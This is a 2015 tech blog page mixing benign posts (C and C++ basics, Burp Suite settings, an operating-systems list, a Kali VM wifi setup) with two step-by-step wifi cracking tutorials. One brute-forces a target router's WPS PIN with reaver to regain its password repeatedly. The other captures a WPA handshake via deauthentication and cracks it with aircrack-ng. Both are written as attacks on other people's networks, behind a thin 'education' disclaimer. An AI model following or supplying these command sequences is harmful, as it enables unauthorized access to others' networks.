Tuesday, April 7, 2015

C Programming


C programming is a popular computer programming language which is widely used for system and application software. Despite being fairly old programming language, C programming is widely used because of its efficiency and control. This tutorial is intended for beginners who does not have any prior knowledge or have very little knowledge of computer programming.

Theory
Video Tutorials
English
Hindi

Fundamentals of C


 Part 1     Part 2     Part 3

 Part 4     Part 5    Part 6 

 Part 7     Part 8     Part 9

Part 1     Part 2     Part 3

Part 4     Part 5






Decision and Loop Control Statement in C




Array and Subscript



Strings



Functions



Structure and Union



Pointers



Files



C Preprocessor and Command Line Arguments




Graphics Using C



Standard Library Functions







Like it ? Share it.

Monday, March 23, 2015

Crack wifi Password and WPS PIN without Dictionary Attack


What is WPS ?
Wi-Fi Protected Setup is known as WPS. It is a wireless networking standard that tries to make connections between a router and wireless devices faster and easier. Security researcher Stefan Viehböck said, the WPS PIN is highly vulnerable to brute force attacks. The eight-digit PIN is stored by routers in two blocks of four digits each. The router checks the first four digits separately from the last four digits. A hacker can brute-force the first block of four digits and move on to the second block. A smart hacker with the right tools can brute-force the pin within a day.In this tutorial we will learn how to crack wifi WPS PIN and Wifi Password what’s more we will learn how can we crack our same target wifi again and again using WPS PIN within Seconds.

Note - Only for Education Purpose

Requirements:
  • Kali Linux OS
  • External Wifi
  • Target Wifi Router
Note - If you are using Kali Linux in Virtual Machine then you need external wifi but if you are using Kali linux with dual boot or as a host OS then your internal wifi will work fine.

1. Open Terminal
(Click image for large view)

2. Write airmon-ng and Press Enter. You will see your Wifi Interface, Chipset and Driver.

3. Write airmon-ng start wlan0 and Press Enter
          Where wlan0 is my interface. It can be different in your System so write it as per your own Interface.

4. Write wash –i mon0 --ignore-fcs and Press enter. You will see your Target Wifi’s BSSID, Channel, WPS Locked Status and ESSID. Press Ctrl + C to stop this scan.

5.   Write reaver –i mon0 –b E8:94:F6:01:0C:60 –d 40 –S –N –vv and Press Enter
              Where E8:94:F6:01:0C:60 is my target wifi BSSID (write your own target’s BSSID) , 40 is delay for trying per Pin, You can increase or decrease this timer. If you want to know about other terms like –S –N then write reaver and Press Enter in a new terminal.
After running above command (actually reaver is a tool) you will see “Associated with E8:94:F6:01:0C:60 (ESSID: geekyshows.com)”. It is a positive sign of cracking process. Sometime you will see “Failed to associate with E8:94:F6:01:0C:60 (ESSID: geekyshows.com)” which means Your target wifi has no network access right now but it doesn’t mean you can’t crack his wifi. You will have to try after sometime.
Now at the end you will see that you have successfully cracked your target wifi’s WPS PIN and Password.

Note - It takes time to crack but it will provide you positive result. You will have to wait at least 24 hours or less.

6. Now we have our target’s wifi WPS PIN so it doesn’t matter if your target recognizes that someone using his internet and how frequently your target changes wifi password. Just because we have target’s WPS PIN we can crack his wifi password again and again till he doesn’t change his WPS PIN.

7. Now Our target is changing his wifi password his old wifi password was kalilinux which we have cracked previously but now he is changing his password with a new password rajhere192. So let’s see how we will crack his new password once again by using WPS PIN within 5 second.

8. Write reaver –i mon0 –b E8:94:F6:01:0C:60 –p 01140200 –vv and Press Enter
           Where E8:94:F6:01:0C:60 is Target’s BSSID and 01140200 is WPS PIN.
You do not need to wait 24 hours this time because we have attacked him with particular WPS PIN So, Now within 5 Second you will crack his new password.
 (Click image for large view)

Now our Tutorials are available on Youtube. Click Below



Like it ? Share it.

Wednesday, March 11, 2015

Why do we use iostream and namespace in C++

#include<iostream>
or
# include<iostream.h>

  • Istream class supports Input function.
  • Ostream class supports output function.

            All objects are included in iostream file So, we can use input or output statement in our programs.


using namespace std;
  • It includes all C++ standard libraries.
  • We do not use this in old IDE like Turbo C++ but we have to use this in all new IDE like Code Blocks, Dev C++ etc.

Friday, March 6, 2015

How to Crack Wifi WPA WPA2 password in Kali Linux with Dictionary Attack


Requirements:
  • Kali Linux
  • Wifi Adapter
  • Wordlist
Note – If you are using Kali linux in VMware then you need external wifi adapter but if you are using Kali Linux along with Win7 or Win8 etc then you can use this method with your internal wifi.

1. Open Terminal
(Click image for large view)

2. Write arimon-ng and press Enter

3. Write airmon-ng start wlan0 and Press Enter after pressing enter you will see that your monitor mode enabled on mon0 as well there are some process running so we need to kill these process.

4. We are killing all process one by one with kill command

5. Write airodump-ng mon0 and Press Enter

6. Write airodump-ng –c 1 –w geekyshows –bssid E8:94:F6:01:0C:60 mon0
           Where 1 is our target CH, geekyshows is a file name you are write as per your favorite one and E8:94:F6:01:0C:60 is your target address.

7. Open new Terminal

8. Write aireplay-ng -0 0 –a E8:94:F6:01:0C:60 mon0 and press Enter (2nd/New terminal)

9. You will see WPA handshake : E8:94:F6:01:0C:60 in your 1st terminal. If you are not able to see this then there is something wrong with your process. Press ctrl + C in both terminal to stop handshake.

10. Close 1st terminal and write ls and Press Enter, in new terminal. It will show your file name which you have saved.


11. Write aircrack-ng –w /root/Desktop/wordlist.txt geekyshows-01.cap and Press Enter. After sometime you will find out the Key/Password of your target wifi.
(Click image for large view)

Now Our Tutorials are also available in Video. Just Click below Icon



Like it ? Share it.

Saturday, February 21, 2015

Connect External Wifi in Kali linux VMware


As we all know that we can’t connect wifi through internal wifi adapter if you are using Kali Linux in VM (Virtual machine). If you want to connect your wifi then you need an external wifi adapter so in this tutorial we will learn how can we connect an external wifi in Kali linux which is installed in VM.

Requirements:
  • Kali linux Installed in VM
  • External Wifi adapter
1. Install Driver and Software in your main System
(Click image for large view)

2. Turn on Your Kali Linux OS there you will find a small icon of your wireless device. Click on the wireless device icon then Click on Connect.

3. Now Click on Network Icon then Click on your available wifi network.

4. Write your wifi password and click on connect.


5. Wait for a while and you are connected. 
(Click image for large view)

Now our tutorials are available on Youtube. Just click below icon



Like it ? Share it.

Tuesday, February 10, 2015

Introduction Burp Suite Part IX (Option Tab)


Suite Options
 This tab contains settings to control how Burp handles platform authentication, upstream proxy servers, SOCKS proxy, timeouts, hostname resolution, and out-of-scope requests.

Platform Authentication
 These settings let you configure Burp to automatically carry out platform authentication to destination web servers. Different authentication types and credentials can be configured for individual hosts.
 Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.
The "Prompt for credentials on platform authentication failure" option causes Burp to display an interactive popup whenever an authentication failure is encountered.
(Click Image for large view)


Upstream Proxy Servers
 These settings control whether Burp will send outgoing requests to an upstream proxy server, or directly to the destination web server.
You can define multiple rules, specifying different proxy settings for different destination hosts, or groups of hosts. Rules are applied in sequence, and the first rule that matches the destination web server will be used. If no rule is matched, Burp defaults to direct, non-proxied connections.
You can use wildcards in the destination host specification (* matches zero or more characters, and ? matches any character except a dot). To send all traffic to a single proxy server, create a rule with * as the destination host. Leave the proxy host blank to connect directly to the specified host.
For each upstream proxy you configure, you can specify an authentication type and credentials if required. Supported authentication types are: basic, NTLMv1, NTLMv2 and digest authentication. The domain and hostname fields are only used for NTLM authentication.

SOCKS Proxy
 These settings let you configure Burp to use a SOCKS proxy for all outgoing communications. This setting is applied at the TCP level, and all outbound requests will be sent via this proxy.
If you have configured rules for upstream HTTP proxy servers, then requests to upstream proxies will be sent via the SOCKS proxy configured here.
If the option "Do DNS lookups over SOCKS proxy" is enabled, then all domain names will be resolved by the proxy. No local lookups will be performed.

Timeouts
 These settings specify the timeouts to be used for various network tasks. You can specify the following timeouts:
Normal - This setting is used for most network communications, and determines how long Burp will wait before abandoning a request and record that a timeout has occurred.
Open-ended responses - This setting is only used where a response is being processed which does not contain a Content-Length or Transfer-Encoding HTTP header. In this situation, Burp waits for the specified interval before determining that the transmission has been completed.
Domain name resolution - This setting determines how often Burp will re-perform successful domain name look-ups. This should be set to a suitably low value if target host addresses are frequently changing.
Failed domain name resolution - This setting determines how often Burp will reattempt unsuccessful domain name look-ups.
Values are in seconds. If an option is left blank, then Burp will never time out that function.

Hostname Resolution
 These settings enable you to specify mappings of hostnames to IP addresses, to override the DNS resolution provided by your computer.
Each hostname resolution rule specifies a hostname, and the IP address that should be associated with that hostname. Rules can be individually enabled or disabled.
This feature can be useful to ensure correct onward forwarding of requests when the hosts file has been modified to perform invisible proxying of traffic from non-proxy-aware thick client components.

Out-of-Scope Requests
 This feature can be used to prevent Burp from issuing any out-of-scope requests. It can be useful when you need to guarantee that no requests are made to targets that are not in-scope for your current work. Even if your browser makes requests for out-of-scope items, the outgoing requests will be dropped by Burp.
You can enable this feature for the current Target scope. Alternatively, you can define a custom scope using URL-matching rules.
(Click Image for large view)



Like it ? Share it.

Friday, February 6, 2015

Top Ten Best Operating Systems


An operating system (OS) is software that manages computer hardware resources and provides common services for computer programs. The operating system is an essential component of the system software in a computer system. Application programs usually require an operating system to function.
 Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting software for cost allocation of processor time, mass storage, printing, and other resources.
Below are Best Operating System: 

Ubuntu
Ubuntu is a popular linux based distribution , developed by canonical corporations. Designed to work beautifully on the latest laptops, desktops and touch screen devices, it looks incredible on high resolution screens — and with touch screen enhancements and interface refinements including individual menu bars in each application window, it’s now even easier to use.

Windows 8.1
Windows 8.1 is a version of Windows NT family of operating systems and an upgrade for Windows 8. Windows 8.1 is available free of charge for retail copies of Windows 8 and Windows RT users via Windows Store. Unlike service packs on previous versions of Windows, users who obtained 8 outside of retail copies or pre-loaded installations must obtain 8.1 through new installation media from their respective subscription or enterprise channel.

Macintosh
The Macintosh, marketed as Mac, is a line of personal computers (PCs) designed, developed, and marketed by Apple Inc. It was initially targeted mainly at the home, education, and creative professional markets. Since the introduction of the Macintosh, the computer has seen significant evolution, now making it one of the most powerful general purpose computers on the market. It now targets the business, science, and law markets as well.

Windows 7
Windows 7 is a personal computer operating system developed by Microsoft, a version of Windows NT. Development of 7 occurred as early as 2006 under the codename "Blackcomb". Windows 7 was released to manufacturing on July 22, 2009, and became generally available on October 22, 2009, less than three years after the release of its predecessor, Windows Vista. Windows 7's server counterpart, Windows Server 2008 R2, was released at the same time.

Fedora
Fedora is an operating system based on the Linux kernel, developed by the community-supported Fedora Project and owned by Red Hat. Fedora contains software distributed under a free and open source license and aims to be on the leading edge of such technologies.

Linux Mint
Linux Mint is an Ubuntu-based distribution whose goal is to provide a more complete out-of-the-box experience by including browser plugins, media codecs, support for DVD playback, Java and other components. It also adds a custom desktop and menus, several unique configuration tools, and a web-based package installation interface. Linux Mint is compatible with Ubuntu software repositories.

Debian
Debian is an operating system composed of free software mostly carrying the GNU General Public License. The operating system is developed by an internet collaboration of volunteers aligned with The Debian Project.
Debian GNU/Linux is one of the most popular Linux distributions for personal computers and network servers

OpenSuse
openSUSE is a free and Linux-based operating system for your PC, Laptop or Server. openSUSE is a general purpose operating system built on top of the Linux kernel, developed by the community-supported openSUSE Project and sponsored by SUSE and a number of other companies. After Novell acquired SUSE Linux in January 2004, Novell decided to release the SUSE Linux Professional product as a 100% open source project.

Sun Solaris
Solaris is a Unix operating system originally developed by Sun Microsystems. It superseded their earlier SunOS in 1993. Solaris is known for its scalability, especially on SPARC systems, and for originating many innovative features such as DTrace, ZFS and Time Slider. Solaris supports SPARC-based and x86-based workstations and servers from Oracle and other vendors, with efforts underway to port to additional platforms. Solaris is registered as compliant with the Single Unix Specification.

Mandriva
Mandriva Linux was launched in 1998 under the name of Mandrake Linux, with the goal of making Linux easier to use for everyone. At that time, Linux was already well-known as a powerful and stable operating system that demanded strong technical knowledge and extensive use of the command line; MandrakeSoft saw this as an opportunity to integrate the best graphical desktop environments and contribute its own graphical configuration utilities to quickly become famous for setting the standard in Linux ease of use. In February 2005, MandrakeSoft merged with Brazil's Conectiva to form Mandriva S.A., with headquarters in Paris, France. The company's flagship product, Mandriva Linux, offers all the power and stability of Linux to both individuals and professional users in an easy-to-use and pleasant environment.



Like it ? Share it.